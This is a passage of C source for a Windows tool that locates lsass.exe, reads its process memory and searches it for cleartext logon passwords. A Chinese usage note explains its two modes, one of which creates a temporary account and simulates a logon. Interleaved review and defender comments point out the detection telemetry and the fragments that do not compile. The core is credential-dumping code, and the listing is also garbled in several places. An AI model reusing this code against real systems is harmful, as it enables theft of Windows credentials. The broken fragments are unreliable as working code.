UINT OffSet = 0;
UINT i = 0;
UINT j = 0 ;
UINT Count = 0;
if (Buffer == NULL)
{
return -1;
}
for (i = 0 ; i 0)
{
Password[Count++] =
Buffer[j];
}
else
{
break;
}
}
return i + 7; // One
Flag To Indicate We Find The Password
}
}
}
return -1; //
Well,We Fail To Find The Password,And This Always Happens
}
// End Search
//------------------------------------------------------------------------------------
// Purpose: To Get The Lsass.exe PID
// Return Type: DWORD
// Parameters: None
//------------------------------------------------------------------------------------
DWORD GetLsassPID()
{
// Walks a Toolhelp process snapshot and returns the PID of the first process
// whose image name matches "Lsass.EXE" (strcmpi: case-insensitive compare).
// Returns 0 when the snapshot cannot be created, when the enumeration fails,
// or when no match is found -- callers cannot tell these cases apart.
// Defender note: a Toolhelp walk that resolves lsass.exe, followed by
// OpenProcess(PROCESS_VM_READ) on it (see FindPassword), is the process-access
// pattern that Sysmon Event ID 10 / EDR telemetry is tuned to alert on.
HANDLE hProcessSnap;
HANDLE hProcess =
NULL; // NOTE(review): declared but never used in this function
PROCESSENTRY32 pe32;
DWORD PID = 0;
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if(
hProcessSnap == INVALID_HANDLE_VALUE )
{
printf("Fail To Create Snap
Shot\n"); // NOTE(review): string literal split across lines in this listing -- extraction damage
return 0;
}
pe32.dwSize = sizeof(PROCESSENTRY32); // must be set before Process32First
if( !Process32First(hProcessSnap, &pe32))
{
CloseHandle(hProcessSnap); // Must clean up the snapshot object!
return
0;
}
do
{
if (strcmpi(pe32.szExeFile,"Lsass.EXE") == 0) // first match wins (break below)
{
PID =
pe32.th32ProcessID;
break;
}
}while(Process32Next( hProcessSnap,
&pe32));
CloseHandle( hProcessSnap); // released on every path after a successful snapshot
return PID;
}
// End GetLsassPID()
//------------------------------------------------------------------------------------
// Purpose: To Find The Password
// Return Type: BOOLEAN
// Parameters:
// In: DWORD PID -> The Lsass.exe's PID
//------------------------------------------------------------------------------------
BOOL FindPassword(DWORD PID)
{
// Reads a single 5 KiB window of the target process's memory starting at the
// file-scope BaseAddress (defined outside this listing), hands the bytes read
// to Search(), and prints the offset and the file-scope Password buffer when
// Search reports a hit.
// Returns FALSE only when OpenProcess or ReadProcessMemory fails; it returns
// TRUE whether or not anything was found, so the return value does not mean
// "password found".
// Defender note: OpenProcess(PROCESS_VM_READ) + ReadProcessMemory against
// lsass.exe is the canonical credential-access pattern. It is visible in
// Sysmon Event ID 10 / EDR process-access telemetry, and LSA Protection
// (RunAsPPL) or Credential Guard denies this kind of read on systems that
// support them.
HANDLE hProcess = NULL;
char
Buffer[5 * 1024] = ; // NOTE(review): initializer lost in this listing (likely "{0}" or similar); as printed this line does not compile
DWORD ByteGet = 0; // bytes actually transferred; passed to Search as the length
int Found = -1; // offset reported by Search, or -1 when nothing was found
hProcess = OpenProcess(PROCESS_VM_READ,FALSE,PID); // Open Process
if
(hProcess == NULL)
{
printf("Fail To Open Process\n");
return FALSE;
}
if (!ReadProcessMemory(hProcess,(PVOID)BaseAddress,Buffer,5 *
1024,&ByteGet)) // Read The Memory From Lsass.exe
{
printf("Fail To
Read Memory\n"); // NOTE(review): string literal split across lines in this listing -- extraction damage
CloseHandle(hProcess);
return FALSE;
}
CloseHandle(hProcess); // handle is closed on both the failure and success paths
Found = Search(Buffer,ByteGet); // Search The Password
if (Found >= 0)
// We May Find The Password
{
// strlen(Password) requires Search() to have NUL-terminated the file-scope
// Password buffer; the Search fragment visible in this listing only stores
// bytes, so that cannot be confirmed from here.
if (strlen(Password) > 0) // Yes,We
Find The Password Even We Don't Know If The Password Is Correct Or Not
{
// NOTE(review): BaseAddress is declared outside this listing; whether
// "Found + BaseAddress" is integer or pointer arithmetic (and whether %x
// matches it) depends on that declaration -- confirm.
printf("Found Password At #0x%x -> \"%s\"\n",Found +
BaseAddress,Password);
}
}
else
{
printf("Fail To Find The
Password\n"); // NOTE(review): string literal split across lines in this listing -- extraction damage
}
return TRUE;
}
// End FindPassword
//------------------------------------------------------------------------------------
// Purpose: Check If The Box Is Windows 2003
// Return Type: BOOLEAN
// Parameters: None
//------------------------------------------------------------------------------------
BOOL Is2003()
{
// Reports whether GetVersionEx identifies the running OS as version 5.2,
// the major.minor pair this file treats as Windows 2003.
// Returns TRUE iff dwMajorVersion == 5 and dwMinorVersion == 2.
OSVERSIONINFOEX osvi;
BOOL b0sVersionInfoEx; // NOTE: second character is a zero, not 'O'; assigned below but never read
ZeroMemory(&osvi,sizeof(OSVERSIONINFOEX));
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX); // must hold the struct size before the call
if (!(b0sVersionInfoEx=GetVersionEx((OSVERSIONINFO *)&osvi)))
{
// NOTE(review): this fallback only shrinks dwOSVersionInfoSize and never
// calls GetVersionEx again, so after a failed first call the comparison
// below runs against the zeroed struct and yields FALSE.
osvi.dwOSVersionInfoSize=sizeof(OSVERSIONINFO);
}
return
(osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 2);
}
// End Is2003()
// End Of File
附件程序相当于密码定位程序,用来测试在lsass内存中搜索指定的字符串或模拟登陆的密码.
用法:
1.locator 字符串 -> 在lsass进程内存中搜索指定的那个"字符串",返回确定的位置
2.Locator 用户名 密码 ->
在系统中建立一个由参数指定的用户,并进行模拟登陆,然后搜索"密码"在lsass进程内存中的位置;生成的帐户在程序运行完后会自动删除。